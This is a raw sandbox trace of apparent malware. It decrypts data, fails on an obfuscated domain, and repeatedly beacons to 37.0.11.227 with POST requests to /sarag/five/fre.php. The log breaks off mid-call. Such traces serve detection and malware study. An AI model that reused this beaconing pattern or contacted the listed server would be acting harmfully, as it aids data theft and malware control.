0x690000 [0177.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.025] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.025] GetProcessHeap () returned 0x690000 [0177.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0177.026] GetProcessHeap () returned 0x690000 [0177.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0177.026] GetProcessHeap () returned 0x690000 [0177.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0177.026] GetProcessHeap () returned 0x690000 [0177.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0177.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.028] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0177.042] GetProcessHeap () returned 0x690000 [0177.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0177.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.043] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0177.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.044] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.045] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.045] GetProcessHeap () returned 0x690000 [0177.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0177.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.047] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0177.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.048] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0177.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.049] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0177.049] GetProcessHeap () returned 0x690000 [0177.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0177.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.050] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0177.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.052] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0177.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.053] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0177.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.054] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0177.054] GetProcessHeap () returned 0x690000 [0177.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.054] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaf0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0177.054] GetProcessHeap () returned 0x690000 [0177.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0177.054] socket (af=2, type=1, protocol=6) returned 0x2a8 [0177.055] connect (s=0x2a8, name=0x6aeaf0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0177.081] FreeAddrInfoW (pAddrInfo=0x6a9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaf0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0177.081] GetProcessHeap () returned 0x690000 [0177.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0177.081] GetProcessHeap () returned 0x690000 [0177.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0177.082] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0177.083] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.083] GetProcessHeap () returned 0x690000 [0177.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0177.083] GetProcessHeap () returned 0x690000 [0177.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0177.084] GetProcessHeap () returned 0x690000 [0177.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0177.084] GetProcessHeap () returned 0x690000 [0177.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0177.084] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0177.085] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.085] GetProcessHeap () returned 0x690000 [0177.085] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0177.085] GetProcessHeap () returned 0x690000 [0177.086] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0177.086] send (s=0x2a8, buf=0x6abd08*, len=242, flags=0) returned 242 [0177.086] send (s=0x2a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0177.086] GetProcessHeap () returned 0x690000 [0177.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0177.087] recv (in: s=0x2a8, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0177.162] GetProcessHeap () returned 0x690000 [0177.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0177.162] GetProcessHeap () returned 0x690000 [0177.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0177.163] GetProcessHeap () returned 0x690000 [0177.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0177.163] GetProcessHeap () returned 0x690000 [0177.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0177.164] closesocket (s=0x2a8) returned 0 [0177.165] GetProcessHeap () returned 0x690000 [0177.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0177.165] GetProcessHeap () returned 0x690000 [0177.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0177.165] GetProcessHeap () returned 0x690000 [0177.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0177.165] GetProcessHeap () returned 0x690000 [0177.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0177.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb60) returned 0x2a8 [0177.169] Sleep (dwMilliseconds=0xea60) [0177.174] GetProcessHeap () returned 0x690000 [0177.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0177.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.175] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.182] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0177.188] GetProcessHeap () returned 0x690000 [0177.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0177.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.189] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0177.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.190] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.191] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.191] GetProcessHeap () returned 0x690000 [0177.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0177.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.192] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0177.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.193] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0177.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.195] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0177.195] GetProcessHeap () returned 0x690000 [0177.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0177.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.204] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.205] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.206] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.212] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.212] GetProcessHeap () returned 0x690000 [0177.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.212] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.213] GetProcessHeap () returned 0x690000 [0177.213] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0177.213] GetProcessHeap () returned 0x690000 [0177.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0177.214] GetProcessHeap () returned 0x690000 [0177.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0177.215] GetProcessHeap () returned 0x690000 [0177.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0177.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.216] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0177.231] GetProcessHeap () returned 0x690000 [0177.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0177.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.232] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0177.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.233] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.234] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.234] GetProcessHeap () returned 0x690000 [0177.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0177.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.238] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0177.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.250] CryptDestroyKey (hKey=0x69d628) returned 1 [0177.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.251] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0177.251] GetProcessHeap () returned 0x690000 [0177.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0177.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.252] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0177.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.253] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0177.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.254] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0177.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.255] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0177.255] GetProcessHeap () returned 0x690000 [0177.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.255] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0177.255] GetProcessHeap () returned 0x690000 [0177.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0177.255] socket (af=2, type=1, protocol=6) returned 0x2ac [0177.256] connect (s=0x2ac, name=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0177.285] FreeAddrInfoW (pAddrInfo=0x6a9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0177.285] GetProcessHeap () returned 0x690000 [0177.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0177.285] GetProcessHeap () returned 0x690000 [0177.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0177.286] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0177.287] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.287] GetProcessHeap () returned 0x690000 [0177.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0177.287] GetProcessHeap () returned 0x690000 [0177.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0177.288] GetProcessHeap () returned 0x690000 [0177.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0177.288] GetProcessHeap () returned 0x690000 [0177.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0177.288] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0177.289] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.290] GetProcessHeap () returned 0x690000 [0177.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0177.290] GetProcessHeap () returned 0x690000 [0177.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0177.290] send (s=0x2ac, buf=0x6abd08*, len=242, flags=0) returned 242 [0177.293] send (s=0x2ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0177.293] GetProcessHeap () returned 0x690000 [0177.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0177.293] recv (in: s=0x2ac, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0177.373] GetProcessHeap () returned 0x690000 [0177.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0177.374] GetProcessHeap () returned 0x690000 [0177.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0177.374] GetProcessHeap () returned 0x690000 [0177.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0177.375] GetProcessHeap () returned 0x690000 [0177.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0177.375] closesocket (s=0x2ac) returned 0 [0177.376] GetProcessHeap () returned 0x690000 [0177.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0177.376] GetProcessHeap () returned 0x690000 [0177.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0177.376] GetProcessHeap () returned 0x690000 [0177.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0177.376] GetProcessHeap () returned 0x690000 [0177.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0177.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8c0) returned 0x2ac [0177.379] Sleep (dwMilliseconds=0xea60) [0177.381] GetProcessHeap () returned 0x690000 [0177.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0177.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0177.398] GetProcessHeap () returned 0x690000 [0177.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0177.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.400] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0177.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.401] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.404] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.404] GetProcessHeap () returned 0x690000 [0177.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0177.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.405] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0177.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.406] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0177.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.407] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0177.407] GetProcessHeap () returned 0x690000 [0177.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0177.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.408] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.410] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.411] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.416] GetProcessHeap () returned 0x690000 [0177.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.416] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.416] GetProcessHeap () returned 0x690000 [0177.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0177.417] GetProcessHeap () returned 0x690000 [0177.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0177.417] GetProcessHeap () returned 0x690000 [0177.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0177.417] GetProcessHeap () returned 0x690000 [0177.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0177.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.418] CryptAcquireContextW (in: 